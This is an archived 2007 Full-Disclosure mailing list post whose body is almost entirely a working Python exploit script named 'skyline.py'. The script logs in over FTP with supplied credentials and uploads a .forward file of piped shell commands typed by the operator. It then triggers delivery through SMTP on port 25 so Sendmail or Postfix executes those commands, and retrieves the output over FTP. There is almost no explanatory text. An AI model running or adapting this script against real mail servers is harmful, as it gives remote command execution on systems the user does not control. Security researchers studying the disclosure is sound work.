[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Sendmail/Postfix FORWARD Remote Exploit

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Sendmail/Postfix FORWARD Remote Exploit
From: "kcope" <kingcope@xxxxxxx>
Date: Fri, 14 Dec 2007 03:57:45 +0100

exploiting "features"

(see attached)

- -kcope / 2007

-- 
Psssst! Schon vom neuen GMX MultiMessenger gehört?
Der kann`s mit allen: http://www.gmx.net/de/go/multimessenger

#!python
# (C) 2007 kcope production

from ftplib import FTP
import sys
import socket

print "Sendmail/Postfix FORWARD Remote Exploit"
print "kcope/2007 - hey alex,andi"

if (len(sys.argv) != 4):
        print "usage: skyline.py <hostname> <ftp username> <ftp password>"
        sys.exit()

hostname = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

print "[+] INITIAL FTP STOR"

def FTPconnect(initial):
        try:
                ftp = FTP(hostname)
                print ftp.getwelcome()
                ftp.login(username, password)
                if (initial):
                        f = open(".forward", "wb")
                        f.write("|touch /tmp/XXX\n")
                        f.close()
                f = open(".forward", "rb")
                ftp.storbinary("STOR .forward", f)
                ftp.quit()
                f.close()
        except:
                print "[-] FTP Error. Correct Login Credentials ?"
                sys.exit()

FTPconnect(True)

print "[+] PLEASE ENTER COMMANDS TO EXECUTE"
print "[+] sendmail allows a single command"
print "[+] postfix allows many"
print "[+] END WITH . IN A SINGLE LINE"

input = sys.stdin.readline().strip()

f = open(".forward", "wb")
f.writelines("|" + "\"" + input + "> ~/RESULTS" + "\"" + "\n")

while (True):
        input = sys.stdin.readline().strip()
        if (input == "."): break
        f.writelines("|" + "\"" + input + ">> ~/RESULTS" + "\"" + "\n")

f.close()

print "[+] FTP STOR"
FTPconnect(False)

print "[+] EXPLOITING BOX"

try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((hostname, 25))
        smtpline = s.recv(1024)
        smtphostname = smtpline[4:smtpline.find(" ", 5)]
        s.close()
except:
        print "[-] EXPLOTATION Error. Is sendmail/postfix running ?"
        sys.exit()

try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((hostname, 25))
        smtpline = s.recv(1024)
        print smtpline
        s.send("HELO eyecandy\r\n")
        s.recv(1024)
        s.send("MAIL FROM: " + username + "@" + smtphostname + "\r\n")
        s.recv(1024)
        s.send("RCPT TO: " + username + "@" + smtphostname + "\r\n")
        s.recv(1024)
        s.send("DATA" + "\r\n")
        s.recv(1024)
        s.send("." + "\r\n")
        s.recv(1024)
        s.send("quit" + "\r\n")
        s.recv(1024)
        s.close()
except:
        print "[-] EXPLOTATION Error. Is sendmail/postfix running ?"
        sys.exit()

print "[+] RETRIEVING RESULTS"

try:
        ftp = FTP(hostname)
        print ftp.getwelcome()
        ftp.login(username, password)
        ftp.retrlines("RETR RESULTS")
        ftp.delete("RESULTS")
except:
        print "[-] FTP RETRIEVE Error. Correct Login Credentials ? Sendmail / 
postfix accepting messages ?"
        sys.exit()

for line in open("RESULTS"):
        print line

f.close()

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] Sendmail/Postfix FORWARD Remote Exploit
  - From: Fredrick Diggle

Prev by Date: Re: [Full-disclosure] Small Design Bug in Postfix - REMOTE
Next by Date: Re: [Full-disclosure] Small Design Bug in Postfix - REMOTE
Previous by thread: Re: [Full-disclosure] gimp sc, and evilness
Next by thread: Re: [Full-disclosure] Sendmail/Postfix FORWARD Remote Exploit
Index(es):
- Date
- Thread